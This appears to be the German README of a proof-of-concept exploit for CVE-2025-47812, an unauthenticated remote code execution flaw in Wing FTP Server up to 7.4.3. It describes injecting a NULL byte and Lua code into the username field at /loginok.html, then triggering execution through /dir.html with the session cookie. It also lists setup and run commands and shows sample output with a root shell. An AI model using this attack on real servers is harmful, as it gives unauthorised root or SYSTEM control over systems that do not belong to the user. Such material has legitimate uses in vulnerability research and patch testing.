
Proof-of-Concept-Exploit für CVE-2025-47812: Nicht authentifizierte Remote-Code-Execution in Wing FTP Server <= 7.4.3 über NULL-Byte-Injection im Benutzernamenparameter, die Root-/SYSTEM-Shell-Zugriff ermöglicht.
Schwachstelle zur nicht authentifizierten Remote-Codeausführung in Wing FTP Server <= 7.4.3. Ein während der Anmeldung in den Parameter
usernameinjiziertes NULL-Byte bewirkt, dass Lua-Code in die Sitzungsdatei geschrieben wird. Wird/dir.htmlmit dem resultierenden Sitzungs-Cookie aufgerufen, wird der injizierte Code ausgeführt – unter Linux als Root, unter Windows als SYSTEM.
/loginok.html injiziert ein NULL-Byte gefolgt von Lua-Code in das Feld username./dir.html mit dem zurückgegebenen UID-Cookie löst die Ausführung des injizierten Lua-Codes aus.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
Beispiel:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root